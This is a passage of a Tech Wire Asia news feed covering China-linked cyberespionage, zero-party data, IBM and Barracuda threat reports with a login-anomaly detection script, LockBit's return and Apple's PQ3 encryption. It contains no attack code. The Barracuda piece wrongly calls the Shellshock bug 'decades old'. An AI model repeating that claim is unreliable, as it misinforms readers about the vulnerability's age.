    This situation intensifies the already heightened tensions between Beijing and Washington over cybersecurity, with each side increasingly accusing the other of espionage. China has retorted with allegations of U.S. cyber intrusions into major Chinese corporations, such as Huawei Technologies.

    One notable incident highlighted by U.S. prosecutors involved targeting staffers from a U.S. presidential campaign in 2020, corroborating Google’s reports of malicious emails sent to President Joe Biden’s campaign team, though no breach was confirmed.

    The hacking of a significant American public opinion research firm in 2018, during the U.S. midterm elections, underscores the hackers’ strategic interest in political entities for their invaluable intelligence and data.

    John Hultquist, chief analyst for U.S. cybersecurity intelligence firm Mandiant, has pointed out the substantial value political organizations offer to espionage efforts, underlining the critical insights and extensive data they provide to actors like APT31 in search of geopolitical intelligence.

    The global stage of cyber warfare

    The narrative has broadened beyond the initial U.S. and UK accusations against China regarding cyberespionage. The New Zealand government has also come forward, expressing its concerns to the Chinese government about a state-backed cyberattack on New Zealand’s parliament in 2021, discovered by the country’s intelligence services. This incident contributes to the intricate landscape of international cyber tensions.

    This exposure of unauthorized access to New Zealand’s parliamentary systems through malicious cyber activities aligns with the allegations of cyberespionage by Britain and the U.S. against China. New Zealand and Australia have both denounced these extensive cyber operations.

    New Zealand’s Foreign Minister, Winston Peters, has criticized such foreign interference as unacceptable. He highlighted that New Zealand has conveyed its concerns about cyber activities attributed to Chinese government-sponsored groups targeting democratic institutions in New Zealand and the UK to the Chinese ambassador.

    The Chinese Embassy in New Zealand has not yet commented on these accusations.

    The New Zealand Communications Security Bureau (GCSB), in charge of cybersecurity and signals intelligence, has linked a state-sponsored Chinese entity, known as Advanced Persistent Threat 40 (APT40), to the malicious cyber activities against New Zealand’s parliamentary services and parliamentary counsel office in 2021. The GCSB associates APT40 with the Ministry of State Security, noting that while no sensitive or strategic information was compromised, the attackers extracted technical data, potentially enabling further intrusive activities.

    According to the GCSB, a notable portion of the malicious cyber events targeting nationally significant organizations last year were traced back to state-sponsored actors, not exclusively China. The bureau also criticized similar cyber activities linked to Russia.

    Judith Collins, the minister responsible for the GCSB, stated that cyberespionage efforts targeting democratic institutions are universally condemnable.

    Towards a unified stance against cyber intrusions

    This development follows charges, sanctions, and accusations by American and British officials against Beijing, accusing it of conducting a widespread cyberespionage campaign that allegedly affected millions globally, including lawmakers, academics, journalists, and businesses, such as defense contractors. The group behind these activities, identified as Advanced Persistent Threat 31 or “APT31,” is said to be an extension of China’s Ministry of State Security, with a broad list of global targets reported by officials from the two countries.

    A joint statement from Australia’s Foreign Minister Penny Wong and Home Affairs Minister Clare O’Neil criticized the continuous cyber targeting of democratic institutions, emphasizing the adverse impact on democratic and open societies like Australia. They stated that such behavior is unacceptable and must cease.

    In 2019, Australian intelligence attributed a cyberattack on its national parliament and the country’s three largest political parties before the general election to China, though the Australian government has not officially confirmed the perpetrator.

    Well, it looks like the cyber saga is thickening, with China in the hot seat for allegedly orchestrating a vast network of cyberespionage that spans continents. The U.S., UK, New Zealand, and Australia are ramping up their cybersecurity defenses and calling out China’s actions on the global stage. It’s a classic case of “your move, China,” as the international community tightens its ranks against these cyber intrusions.

    But what does the future hold? Well, if history has taught us anything, it’s that with every action comes a reaction. China might double down on its cybersecurity measures and retaliate, or perhaps, just perhaps, this international spotlight could usher in a new era of cyber diplomacy. In a world where technology continues to blur the lines between the possible and the impossible, who’s to say what the future might hold? One thing’s for sure: the global dialogue on cybersecurity is heating up.

    The post Global concerns rise over alleged cyber hacking activities linked to China appeared first on Tech Wire Asia.

    Data ownership and control at the heart of tomorrow’s CX https://techwireasia.com/03/2024/why-zero-party-data-should-be-used-to-create-personalised-experiences/ Tue, 19 Mar 2024 05:25:21 +0000 https://techwireasia.com/?p=238493 The uses of zero- to third-party data can create great CX or destroy all elements of trust between an organization and its customers. With Affinidi’s Glenn Gore.

    Concerns about the quantity and type of data that organisations hold are having increasingly adverse effects on customer experiences. On the one hand, brands’ access to information about their customers allows them to personalise every touchpoint for an individual. Yet, on the flip side, consumers can be alarmed that a company knows too much about them and has access to information they didn’t knowingly disclose. Here, the relationship between brand and consumer is not balanced, a situation that breeds distrust. The consumer, customer, or prospect may simply walk away.

    To understand how this situation arises, we need to distinguish between data types: first- and second-party data, for example. Plus, we should examine the concept of zero-party data. To help us demarcate data types and explore the implications of the relationship between customer experience and data, we spoke to Glenn Gore, CEO of Affinidi. (Read about the Affinidi Trust Network here and here for background.)

    Defining data

    Zero-party data is preference-based or intent-based and is held by the individual to represent the different online versions of themselves. Those different versions could be categorised, for instance, as an individual who is, depending on the context, an employee, a gamer, a charity worker, and a fitness fanatic.

    This is the type of information that may help determine broad preferences for interaction with companies and brands. For example, someone who identifies as female in their zero-party data could be shown a women’s clothing line by default when they land on a clothing website.

    First-party data is the information gathered by an organisation when an individual interacts with it. That could be a list of foodstuffs bought at a store. What’s interesting, Mr Gore told us, is that zero- and first-party data are sometimes contradictory.

    He said: “I say that I don’t want to eat sugary products; that’s zero-party data. But my shopping history says that’s an outright lie because I buy chocolate and fruit juice all the time! So now you can start seeing something really fascinating.”

    In that context, a brand could show a message at checkout offering alternative, low-sugar products. That might lower their revenues, assuming diet alternatives are cheaper, but it would be a better customer experience and a net gain for the relationship.

    Second-party data is information that’s shared, with approval, between the first party and another. “Let’s say I’ve engaged with a nutritionist and I’ve decided to help with the nutritional accuracy,” said Mr Gore. “I share what I buy at the supermarket. So, that data from the grocery store, which is first-party data, is shared with my new nutritionist.

    “The difference here is that it’s with my consent, my knowledge. Nothing else is going to be shipped. The grocery store is not going to share the videotapes of how long I stood staring at the chocolates even though I didn’t buy any.”

    Third-party data is the type of information that is collected and often sold and is “kind of the one that gets everyone in trouble.”

    Mr Gore said: “This is where data that’s been collected about myself is aggregated with lots of other data sets combined and then sold without my consent, without my knowledge. To stay with that same example, my nutritionist says, ‘Well done, Glenn, you’re buying kale, you’re eating lots of healthy things. But I see that you’re not going to the gym?’ How do you know I’m not going to the gym? I never gave you access to my gym membership! I’m not going to be very happy about that. That’s the invasion of privacy that occurs.”

    As awareness of data privacy among consumers grows and increasingly strict laws about data governance fall into place, third-party data not only begins to look less attractive as a concept for the individuals it’s describing but as a potential destroyer of trust and, therefore, customer experience. It’s also a burden of responsibility on organisations that hold it, as it also represents an attractive target for bad actors and legislators.

    Consenting data exchange

    The key to better customer experiences, and ones that are truly personalised, is the combination of zero and first-party data, which combines intent with action. Then, multiple second-party data instances form a network of consensual data sharing, building mutual trust between the consumer and other organisations.

    Mr Gore sees the future of what we now call the ‘data economy’ as one where consumers can join or create their own versions of trust networks, parties with whom they consensually share and receive value in return.

    The Affinidi Trust Network is the system that Affinidi is building, comprising a “duality of innovation, the two sides of the same coin.” Developers can already build the components of the Trust Network into vendors’ and service-creators’ offerings. For end-users, the arbiters of their own data, Mr Gore envisages services that will help with the minutiae of zero-party data interactions.

    “They will be custodial hub managers of your data,” he said. “These custodial holders who manage how you represent and manage yourself will help you do this on your behalf. That app will be driven by a personal AI capable of sifting the many digital interactions that take place online for each user every day and remove much of the detail of personal data management which is cumbersome.

    “You don’t want to wake up every morning with an app saying, ‘We just found another 60 pieces of information about yourself out there on the internet. Do you mind just cataloging those 60?’ Personal AIs will help you with cataloging on your behalf.

    “The worst they may do is to ask about instances where there’s some conflict resolution needed. For example, ‘I’ve automatically organised these 180 different things for you, but these two look like they’re in conflict’, or ‘I know that you might be in the process of changing how you think about this. Can you just help guide me?'”

    As personal data privacy issues accelerate and big tech companies work actively to discourage privacy-focused tools – Google’s intended ban on Chrome ad-blockers later this year is a fine example – solutions like the Affinidi Trust Network and the concept of Holistic Identity make increasing sense.

    Consumers don’t have to subscribe to every aspect of Rana Foroohar’s ‘Don’t Be Evil’ to feel that information about them is being misused. That’s already apparent in so-called customer experience platforms that present personalised interactions that are too all-knowing. Representations of prospects and customers derived from bought, aggregated third-party data produce ‘personalisation’ that’s inaccurate because every individual presents multiple versions of themselves online according to context.

    Allowing individual users to consensually share relevant information with trusted organisations and brands is the way to build a relationship and establish trust. Those are the relationships that will endure and will produce long-term results for commercial entities. The move to consensual (and profitable) provision of customer experiences begins with becoming part of the Affinidi Trust Network, and you can read more here.

    The post Data ownership and control at the heart of tomorrow’s CX appeared first on Tech Wire Asia.

    How vulnerable are we to cyber threats in the digital age? Here’s what IBM found https://techwireasia.com/03/2024/are-we-too-vulnerable-to-cyber-threats-ibm-weighs-in/ Tue, 19 Mar 2024 01:00:36 +0000 https://techwireasia.com/?p=238483

  • 2023 saw a surge in cyber threats, with Malaysia among the top breached countries and a daily average of 74,000 attacks globally.
  • AI emerges as a crucial tool in combating and accelerating cyber threats.
  • A comprehensive security approach is vital for safeguarding against increasing attacks.

    In the first half of 2023, a report from CyberSecurity Malaysia reveals a concerning trend: the government sector has experienced the highest number of data breaches, while the telecommunications sector has seen the largest volume of data leaked. This data underscores the pressing challenges in protecting sensitive information across different sectors.

    National and global cybersecurity challenges

    By October 2023, the National Cyber Coordination and Command Centre (NC4), under the auspices of the National Cyber Security Agency, had already registered close to 3,000 cyber incidents, highlighting the increasing focus on cybersecurity matters within the nation. Adding to the concern, cybersecurity firm Surfshark placed Malaysia as the eighth most breached country in the third quarter of 2023, with nearly half a million accounts compromised.

    The frequency of cyber threats became even more pronounced, with statistics showing that there have been 74,000 attacks daily throughout the year. In a particularly alarming revelation by both Kaspersky and Surfshark, the rate at which Malaysian user accounts were compromised in Q3 2023 amounted to four leaks every minute.

    This data not only underscores the urgency of the cybersecurity situation but also emphasizes the importance of understanding attackers’ tactics to safeguard our people, data, and infrastructure effectively.

    Shifting the focus to a global perspective, IBM’s 2024 X-Force Threat Intelligence Index points to a similar urgency: a growing global identity crisis, as cybercriminals increasingly exploit user identities to infiltrate enterprises worldwide. The report draws on observations from monitoring over 150 billion security events daily across more than 130 countries.

    The emerging crisis is stark: cybercriminals are shifting from hacking online accounts to using readily available internet and dark web data, with AI further simplifying these breaches. This shift allows for deeper incursions into personal lives, exposing everything from daily routines to hobbies and interests.

    IBM X-Force, the offensive and defensive security services branch of IBM Consulting, noted a significant shift in 2023. Cybercriminals preferred using legitimate account credentials to breach corporate networks rather than hacking, making this strategy a favorite among threat actors.

    Asia-Pacific cybersecurity landscape

    The 2024 X-Force study also provides a geographical breakdown of cyber incidents, with the Asia-Pacific region being the third most impacted in 2023, accounting for 23% of global incidents handled by X-Force. This marked a change from 2021 and 2022, when Asia-Pacific was the most affected region. In 2023, Europe rose to the top spot with 32% of incidents, followed by North America at 26%, Asia-Pacific at 23%, Latin America at 12%, and the Middle East and Africa at 7%.

    In the Asia-Pacific, manufacturing continued to be the industry most targeted by cyber attacks for the second consecutive year, comprising 46% of incidents. Finance, insurance, and transportation industries followed, each representing 12% of incidents, and education came in third at 8%.

    Phishing remained the predominant method for gaining initial access, responsible for 36% of incidents, closely followed by attacks on public-facing applications at 35%.

    Phishing in action (Source – IBM)

    Once inside, malware was the leading action, with 45% of attacks involving this tactic, including ransomware (17%) and info stealers (10%).

    The report suggests that the return on investment (ROI) from attacking generative AI platforms isn’t significant yet. However, X-Force anticipates large-scale attacks on these technologies once a single AI gains 50% market share or the market narrows down to three or fewer competitors.

    Despite a 44% drop in phishing attack volume from the previous year, phishing remains a primary method of attack, particularly as AI can refine phishing lures and cut the time needed to craft them by nearly two days, keeping it a preferred method among cybercriminals.

    The role of AI in dealing with cyber threats

    Amidst these cybersecurity challenges, AI emerges as a pivotal tool in both exacerbating and combating threats. AI is now widely recognized for its utility, especially in how it has revolutionized threat detection, response times, and the protection of user identities and data flow. According to the IBM Cost of Data Breach 2023 report, organizations worldwide have saved almost US$1.8 million on data breach costs by leveraging AI and automation, compared to those that haven’t embraced these technologies.

    However, the advent of generative AI introduces new challenges and opportunities in both attacking and defending enterprise assets. As the AI capabilities of attackers evolve, we can expect their attacks to become faster, more precise, and scalable. Conversely, AI is also poised to boost the productivity of enterprise security, with its ability to quickly identify and prioritize threats like ransomware based on their signatures and behaviors—even if it’s a variant the system hasn’t encountered before.

    Generative AI, with its capacity for self-learning, doesn’t require prior exposure to specific scenarios to detect new, sophisticated threats. This aspect makes it invaluable for cybersecurity, where it accelerates business processes by automating threat detection and investigation and adapts real-time organizational response strategies based on past incidents. It frees up security teams to tackle more complex and strategic security challenges.

    The 2024 X-Force study suggests that as generative AI gains market dominance, it could also become a focal point for cybercriminals, encouraging further investment in tools designed for AI-engineered attacks. Despite the growing concern over such attacks, the primary security threat in the Asia Pacific region remains the exploitation of known, unpatched vulnerabilities.

    Attention must also be directed towards protecting the region’s critical infrastructure and key sectors like manufacturing, finance, insurance, and transportation. This includes conducting stress tests and having a robust incident response plan ready.

    With the increasing preference among global threat actors for exploiting user identities, there’s a pressing need for more effective user access control measures. This scenario underscores the importance of a comprehensive approach to security in the era of generative AI, highlighting the need for heightened vigilance and adaptation in cybersecurity strategies.

    Strategic cybersecurity measures to prevent malicious cyber threats

    Various strategies can mitigate cybersecurity threats, and numerous AI solutions claim to offer protection against a wide array of them; the right choice is the one that best aligns with your or your business’s specific needs. For instance, the IBM X-Force Threat Intelligence Index 2024 highlights insights and actionable recommendations for enhancing readiness and improving the speed and efficiency of response to cyberattacks.

    One effective approach is to update identity management across multicloud environments. As cybercriminals increasingly exploit legitimate user accounts to gain access to networks—accounting for 30% of incidents responded to by X-Force in 2023—strengthening identity and access management (IAM) becomes crucial. Solutions like IBM Security Verify can bolster security in hybrid and multicloud setups by providing comprehensive IAM capabilities.

    Beyond identity management, AI plays a critical role in optimizing cybersecurity resources. Tools such as IBM Security QRadar SIEM User Behavior Analytics (UBA) can aid in identifying compromised credentials and malicious activities, allowing teams to utilize their skills and time better. IBM Security QRadar EDR further enhances protection by securing endpoints and detecting unusual activities, such as data exfiltration or unauthorized account creation.

    This pivot from ransomware towards other malware, particularly info stealers that target data theft, underscores the imperative of safeguarding data across hybrid cloud environments through vigilant monitoring and robust data protection measures.

    However, increasing security spending alone may not suffice. Embracing a zero-trust model and prioritizing trusted data can bolster your cybersecurity posture significantly. By fostering transparency and accountability, organizations can not only minimize risks but also actively prevent bias, making the zero-trust model and prioritization of trusted data essential strategies.

    In light of these strategies, building trust and preparing for future threats become pivotal. Building trust should be the foundation of every interaction, enhancing cyber-risk management and prioritizing cyber resilience to maintain and strengthen business relationships. This involves constantly monitoring and managing the crucial points where trust is established or compromised.

    Preparing for future threats requires a proactive security stance, including careful selection of partners and regular reviews of their security strategies and practices. Taken together, these measures call for a balanced mix of technology, strategy, and a culture of trust and resilience, and for the vigilance and adaptability needed to combat the evolving threat landscape effectively.

    The post How vulnerable are we to cyber threats in the digital age? Here’s what IBM found appeared first on Tech Wire Asia.

    A year of high-severity attacks and groundbreaking cybersecurity strategies in 2023 https://techwireasia.com/03/2024/how-did-cybersecurity-evolve-in-2023-amid-severe-attack-trends/ Tue, 05 Mar 2024 01:30:10 +0000 https://techwireasia.com/?p=238316

  • Cybersecurity in 2023: An uptick in severe cyberattacks highlighted the importance of enhanced defenses and constant vigilance.
  • Identity compromises led to 2023’s cyberthreats, urging a shift towards AI-enhanced security measures.
  • Stronger authentication and cybersecurity training are critical after a sophisticated spate of cyberthreats in 2023.

    Throughout 2023, Barracuda XDR and its dedicated SOC analysts sifted through nearly two trillion cybersecurity events. Their relentless scrutiny unveiled tens of thousands of potential high-risk security threats, safeguarding countless networks from intrusion.

    A 2023 cybersecurity overview

    The year’s analysis by security experts highlighted the predominant XDR threats. Their research unveiled the tactics attackers employed in their unsuccessful attempts to infiltrate networks. Techniques ranged from business email compromise to deploying malicious code and exploits, showcasing the diverse arsenal used by cybercriminals.

    It’s crucial to understand that XDR and similar defensive security measures are designed to identify, alert, and thwart potential intruders preemptively. This proactive defense often stops attacks before their intended harm can be realized, leaving the ultimate goal of these thwarted attacks, such as deploying ransomware, unknown.

    The trend in 2023 saw a noticeable uptick in high-severity attacks. Specifically, 66,000 threats warranted escalation to SOC analysts for further investigation, with an additional 15,000 posing immediate threats that required swift defensive actions. Notably, the frequency of such threats surged during the latter months of the year, especially from October through December, coinciding with peak online shopping periods and holiday seasons—when attackers likely see increased opportunities due to higher online activity and potentially reduced vigilance from IT staff.

    Highlighting major cyberattack incidents

    In one high-profile instance, HTC Global Services, a key IT and business consulting player, confirmed a cyberattack orchestrated by the ALPHV ransomware group, which began leaking sensitive data online. HTC Global Services, catering to industries like healthcare, automotive, manufacturing, and finance, promptly responded with a public acknowledgment via the social media platform X, emphasizing its commitment to resolving the issue and safeguarding user data integrity.

    This cyberattack disclosure followed the ALPHV group’s public taunt, showcasing stolen data, including personal and sensitive information, and highlighting the tangible risks of such security breaches.

    Similarly, Sony faced a ransomware dilemma with its Insomniac Games division, falling victim to a Rhysida ransomware attack. This incident led to a significant data breach, prompting Insomniac Games to alert employees about their compromised personal information.

    Since its acquisition by Sony in August 2019, Insomniac Games has been a pivotal component of Sony Interactive Entertainment’s PlayStation Studios. It has been at the forefront of developing major titles like Marvel’s Spider-Man 2 for PlayStation 5 and is currently developing Marvel’s Wolverine.

    Sony’s December announcement of an ongoing investigation into the breach by the Rhysida group underscored the severity of the attack, which resulted in over 1.3 million files being stolen. The refusal to meet the ransom demand led to the public leak of 1.67 TB of internal documents, profoundly impacting the studio’s team and revealing extensive personal and contractual information.

    This leak, including previews of the upcoming Wolverine game, represents a significant violation of privacy and security, with Rhysida boasting about leaking 98% of the stolen data after allegedly selling the rest.

    The analysis also highlighted a secondary peak in June, a prime holiday season for many, further underscoring the opportunistic nature of cyberattackers. These patterns, first identified in 2022, reaffirm the heightened risk during periods when potential victims are likely to be less vigilant, emphasizing the need for constant and robust cybersecurity measures.

    High severity threats 2023. (Source – Barracuda).

    The rise of identity compromise in cybersecurity

    In 2023, the primary focus of XDR detections revolved around various forms of identity misuse, leading to compromised accounts. These detections highlighted activities such as unusual login patterns, brute force attacks, and attempts to disable multifactor authentication.

    An alert for uploading a suspicious executable file might suggest that attackers are attempting to transfer additional malicious tools or malware from a controlled external source, like a command-and-control server, into a breached account.

    Endpoint threat detections are initiated by Barracuda’s Managed XDR Endpoint Security whenever a potential threat is identified within a system. These critical alerts require immediate communication with the client for further investigation, regardless of whether the threat was successfully neutralized. This process is vital for determining how the malicious entity was initially executed.

    The scope of these detections spans a broad range of threats, encompassing everything from benign to malicious entities, including potentially unwanted applications, adware, spyware, and more severe threats like ransomware and backdoors. Each type demands a specific strategy for identification and remediation.

    Barracuda XDR uses AI and machine learning for enhanced detection capabilities, particularly in identifying suspicious login activities. These AI-driven rules analyze patterns and establish a user’s typical behavior, flagging any deviations for immediate review.

    Suspicious login activity. (Source – Barracuda).

    One such AI tool, the “Impossible Travel” detection rule, identifies logins from locations improbably far apart within a short time frame, indicating potential account compromise. For instance, Barracuda XDR recorded an example where a login occurred in Iowa, followed by another in Moscow just over an hour later, suggesting an impossible travel speed.

    The “Rare User Log-in” detection rule aims to identify logins using unusual or inactive usernames, potentially signaling unauthorized access by an intruder exploiting dormant accounts or creating new ones for persistent access.

    Similarly, the “Rare Hour for User” detection rule flags logins at atypical times for a user, which could indicate unauthorized access from different time zones or outside of normal working hours.
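    As an added illustration of the "Impossible Travel" and "Rare Hour for User" rules described above (example code written for this page, not Barracuda's detection logic), the script below runs both checks over a handful of constructed login events. The event layout, the city coordinates, the 1,000 km/h feasibility threshold and the per-user baseline hours are all assumptions made for the example; the Iowa-to-Moscow pair mirrors the case the article mentions.

```python
"""
Two login-anomaly rules in miniature, run over constructed events.

- Impossible travel: consecutive logins for one user whose great-circle
  distance divided by elapsed time implies a speed no traveller can reach.
- Rare hour: a login at an hour outside the hours the user normally logs in.

Example code for this page; not a vendor's rule implementation.
"""
import math
from collections import defaultdict
from datetime import datetime, timezone

# Assumption for the example: above this implied ground speed (km/h) a trip
# is treated as infeasible (airliners cruise near 900 km/h).
MAX_FEASIBLE_SPEED_KMH = 1000.0

# Constructed login events: (user, UTC timestamp, city, latitude, longitude).
LOGINS = [
    ("alice", "2023-11-07T14:02:00Z", "Des Moines, IA", 41.5868, -93.6250),
    ("alice", "2023-11-07T15:10:00Z", "Moscow", 55.7558, 37.6173),
    ("bob",   "2023-11-07T09:15:00Z", "London", 51.5074, -0.1278),
    ("bob",   "2023-11-07T17:40:00Z", "Paris", 48.8566, 2.3522),
]

# Constructed baseline: UTC hours at which each user has logged in before.
BASELINE_HOURS = {
    "alice": {13, 14, 15, 16, 17, 18},
    "bob": {8, 9, 10, 11, 12, 13, 14, 15, 16},
}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    earth_radius_km = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * earth_radius_km * math.asin(math.sqrt(a))


def parse_ts(ts):
    """Parse an ISO-8601 UTC timestamp of the form YYYY-MM-DDTHH:MM:SSZ."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def impossible_travel(logins, max_speed_kmh=MAX_FEASIBLE_SPEED_KMH):
    """Return (user, from_city, to_city, implied_speed_kmh) for each infeasible hop."""
    by_user = defaultdict(list)
    for user, ts, city, lat, lon in logins:
        by_user[user].append((parse_ts(ts), city, lat, lon))
    alerts = []
    for user, events in by_user.items():
        events.sort()  # chronological order per user
        for (t1, c1, la1, lo1), (t2, c2, la2, lo2) in zip(events, events[1:]):
            hours = (t2 - t1).total_seconds() / 3600.0
            dist = haversine_km(la1, lo1, la2, lo2)
            if hours <= 0:
                # Simultaneous logins from different places are also infeasible.
                speed = math.inf if dist > 0 else 0.0
            else:
                speed = dist / hours
            if speed > max_speed_kmh:
                alerts.append((user, c1, c2, round(speed)))
    return alerts


def rare_hour(logins, baseline=BASELINE_HOURS):
    """Return (user, timestamp) for logins outside the user's baseline hours."""
    alerts = []
    for user, ts, *_ in logins:
        if parse_ts(ts).hour not in baseline.get(user, set()):
            alerts.append((user, ts))
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(LOGINS):
        print("impossible travel:", alert)
    for alert in rare_hour(LOGINS):
        print("rare hour:", alert)
```

    In production these two rules would read from the identity provider's sign-in log and use a learned baseline per user rather than a hard-coded set of hours; the speed threshold is also typically paired with an allow-list for known VPN or cloud egress locations to keep false positives down.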

    Barracuda XDR’s Intrusion Detection System (IDS) meticulously monitors network traffic, identifying suspicious activities and threats. This system is crucial for spotting both overt and subtle signs of cyberattacks, including malware distribution and other security breaches.

    Analysis of top IDS detections in 2023 underscores a continuous trend of attackers exploiting unpatched vulnerabilities and weaknesses, emphasizing the importance of diligent network security updates.

    Despite being decades old, Shellshock bugs remain a top detection, indicating that many systems are still vulnerable. Similarly, exploits against the Log4Shell vulnerability persist, likely due to the widespread integration of Log4j in software, making mitigation efforts challenging for many organizations.

    Reflection on the 2023 cybersecurity strategy and future

    Merium Khalid, director of SOC offensive security at Barracuda XDR, emphasizes the importance of understanding cyberattackers’ behaviors and strategies. Khalid observes, “Our data for 2023 shows that attackers are launching more high-severity attacks overall, and especially during times when IT teams are away from the workplace or less attentive, such as during holidays, outside working hours, during the night, and at weekends.”

    Khalid further notes that a common goal among these attacks is to breach accounts through identity compromise. With attackers increasingly utilizing AI to enhance the volume, velocity, and complexity of their efforts, Khalid warns of an intensification of these trends. It’s imperative for security teams to arm themselves with equally advanced and effective security solutions.

    To counteract these threats, Barracuda advocates for the adoption of stringent authentication and access management practices. This includes, at a minimum, the implementation of multifactor authentication, with a preference for transitioning towards zero trust architectures. Complementing this with diligent patch management, data security strategies, and regular cybersecurity education for all staff members is also advised.

    Such measures should be part of a comprehensive security strategy that incorporates cutting-edge security technologies. This strategy should be supported by professional analysis and continuous security monitoring by a 24/7/365 SOC to detect and respond to any potential threats or anomalies that might otherwise go unnoticed.

    2023 – a big year for big cyberattacks.

    The post A year of high-severity attacks and groundbreaking cybersecurity strategies in 2023 appeared first on Tech Wire Asia.

    Is the LockBit ransomware group back? https://techwireasia.com/02/2024/is-lockbit-ransomware-group-back/ Wed, 28 Feb 2024 01:30:32 +0000

  • After a disruption by law enforcement agencies, the LockBit ransomware group is back.
  • The ransomware group claims that they are still operational in a new site on the dark web.
  • The group also threatens to launch more cyberattacks on the US.

    Spoilers: the LockBit ransomware group is back. Despite several law enforcement agencies coming together to disrupt the ransomware group’s operations, there are now reports that the cybercriminal gang is back in action.

    According to a report by Reuters, the ransomware group claims to have restored its servers and be back in business. The cybercriminal gang initially had its services disrupted by a joint operation from international law enforcement agencies which included the FBI, Europol and the UK’s National Crime Agency.

    The operation claimed to have taken over several key assets of the ransomware group, including sites and platforms they use to run their activities. Several members of the ransomware group were also arrested and indicted.

    LockBit released a statement saying that law enforcement had hacked their dark web site using a vulnerability in the PHP programming language, which is widely used to build websites and online applications.

    “All other servers with backup blogs that did not have PHP installed are unaffected and will continue to give out data stolen from the attacked companies,” said the statement, which was posted in English and Russian on a new version of Lockbit’s dark web site.

    A spokesperson for Britain’s National Crime Agency, which led the international effort to seize Lockbit’s operations, told Reuters that the group “remains completely compromised.”

    “We recognized LockBit would likely attempt to regroup and rebuild its systems. However, we have gathered a huge amount of intelligence about it and those associated with it, and our work to target and disrupt them continues,” the spokesperson said.

    The Guardian reported that the US charged two Russian nationals with deploying LockBit ransomware against companies and groups around the world. Police in Poland also made an arrest, and in Ukraine, police arrested a father and son they said carried out attacks using LockBit’s malicious software.

    The ransomware group also posted on its new site that it plans to attack US government sites more often. Its revamped website, launched on Saturday, showed a number of purported hacking victims.

    The LockBit ransomware group threatened to launch more cyberattacks on the US.

    Preparing for a LockBit ransomware group retaliation

    Tech Wire Asia caught up with Christopher Budd, director for Sophos X-Ops on the latest updates. Budd shared his views on the recent takedown of LockBit’s site and the need for businesses to be even more prepared to deal with retaliation from the ransomware group.

    “Following word that LockBit’s website may be back up and running, it’s important to note another risk that groups like LockBit pose. Even if a ‘take down’ is 100% effective at nabbing all the members of LockBit, its infrastructure and malware, it won’t stop the malware that’s already in the wild and now outside of that group’s control.

    “New Sophos X-Ops threat intelligence on exploitation attacks of ScreenConnect vulnerabilities highlights this very real threat. Malware in these attacks was built using the LockBit 3 ransomware builder tool that was leaked in 2022, meaning the malware used in these attacks may not have originated with the actual LockBit developers. Because of that leak, there is malware out there being used in attacks that are outside of the control of the LockBit group.

    “This underscores another, often overlooked way in which these criminal groups threaten everyone: their offensive capabilities become part of the broader threat environment, subject to no one’s control. You can be threatened and attacked by the malware developed by a group like LockBit without being threatened and attacked by the group directly,” commented Budd.

    Sophos X-Ops has been tracking the evolution of LockBit over the past four and a half years. According to an analysis by the Sophos X-Ops Incident Response team, LockBit has been among the top 10 most reported ransomware infections since 2020; with the demise of Conti in early 2022, LockBit vaulted to the top of the charts. It ultimately accounted for one in five of all ransomware infections seen by Sophos’s IR in 2023 – comparable in ubiquity in that data to Conti at its peak.  

    LockBit - back from the not-nearly-dead-enough.

    A handout picture released by Britain’s National Crime Agency (NCA) in London on February 20, 2024 shows a screenshot of the seized cybercrime group ‘LockBit’ site.  (Photo by NATIONAL CRIME AGENCY/AFP).

    Meanwhile, Dean Houari, director of security technology and strategy at Akamai, pointed out that ransomware gangs are nimble and a variant of the LockBit gang could fill the void and soon take over with even more damaging tools.

    “The most effective security strategy is to prevent attackers from accessing and encrypting the data on critical servers and have a backup in the event they are able to breach an environment. Now is the time for organizations to reassess the state of their security postures. A thorough understanding of attack surfaces, along with strong processes and playbooks to prevent and recover from ransomware attacks are essential,” said Houari.

    Houari also explained that implementing a zero-trust architecture starting with software-defined micro-segmentation to prevent lateral movement post-breach is critical.

    “Full network visibility to identify indicators of compromise (IoCs) will enable a more offensive posture against ransomware attacks and allow compliance with local cybersecurity regulations,” he added.

    Apple adds PQ3 protocol into iMessage https://techwireasia.com/02/2024/pq3-protocol-apple-imessage-unrivaled-security-upgrade/ Tue, 27 Feb 2024 00:30:19 +0000

  • Apple is upgrading its iMessage platform to enhance protection against imminent encryption-breaking technologies.
  • iMessage now achieves Level 3 security using the new PQ3 protocol, providing robust defense against quantum attacks, a unique feature among messaging services.
  • Apple confirms state-of-the-art encryption algorithms; no successful attacks have been detected yet.

    In an era where digital privacy is paramount, Apple is integrating PQ3 into iMessage. This announcement marks a watershed moment in messaging security, propelling iMessage to unprecedented heights of protection. As the first widely deployed messaging app to achieve Level 3 security, what does the announcement mean for iPhone users, and why should they care?

    At the heart of Apple’s PQ3 integration lies a revolutionary cryptographic protocol designed to withstand the challenges posed by quantum computing. Unlike traditional encryption methods, which may be vulnerable to future quantum attacks, PQ3 provides robust protection against even the most sophisticated adversaries. Using advanced cryptographic techniques, PQ3 ensures that iMessage conversations remain secure and private, regardless of the evolving threat landscape.

    “To our knowledge, PQ3 has the strongest security properties of any at-scale messaging protocol in the world,” Apple’s Security Engineering and Architecture (SEAR) team stated in a blog post a week ago.

    The new state of the art in quantum-secure messaging at scale. Source: Apple.

    A quantum leap in messaging security

    Traditionally, messaging platforms rely on classical public key cryptography like RSA, elliptic curve signatures, and Diffie-Hellman key exchange for secure end-to-end encryption. These algorithms are based on complex mathematical problems deemed computationally intensive for conventional computers, even with Moore’s law in play. However, the advent of quantum computing poses a new challenge.

    A powerful enough quantum computer could solve these mathematical problems in novel ways, potentially jeopardizing the security of end-to-end encrypted communications. While quantum computers capable of decryption aren’t yet available, well-funded attackers can prepare by exploiting cheaper data storage. They accumulate encrypted data now, planning to decrypt it later with future quantum technology—a tactic termed “harvest now, decrypt later.”

